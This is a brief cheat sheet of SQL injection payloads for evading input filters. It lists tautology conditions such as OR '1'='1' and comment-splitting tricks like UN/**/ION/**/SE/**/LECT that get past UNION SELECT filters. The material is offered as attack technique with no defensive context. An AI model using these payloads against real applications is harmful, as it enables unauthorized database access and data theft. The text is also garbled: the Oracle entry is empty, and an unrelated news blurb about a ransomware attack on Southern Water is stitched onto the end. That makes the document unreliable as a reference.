here or some Simple replacments to Evoid SQL Injection filters
OR '1' = '1'
OR 1 = 1
OR 'unusual' = 'unusual'
OR 'Simple' = 'Sim' + 'ple'
OR 'Simple'= N'simple' # the N dosent make any diffrence
OR 'Simple' > 'S'
OR 'Simple' < 'X' OR 'Simple' LIKE 'Sim%' OR 2 > 1
OR 'Simple' IN ('Simple')
OR 'Simple' BETWEEN 'R' and 'T'
play with spaces or drop them completely
To escape any filter that checks a UNION followed by spaces and then the work SELECT –we can use a C like comment syntax available for most of DB's
UNION /**/ SELECT name…
For ORACLE use:
For MySql use:
UN/**/ION/**/ SE/**/LECT/**
Southern Water says Black Basta ransomware attack cost £4.5M in expenses
United Kingdom water supplier Southern Water has disclosed that it incurred
costs of £4.5 million ($5.7M) due to a cyberattack it suffered in February
30 minutes ago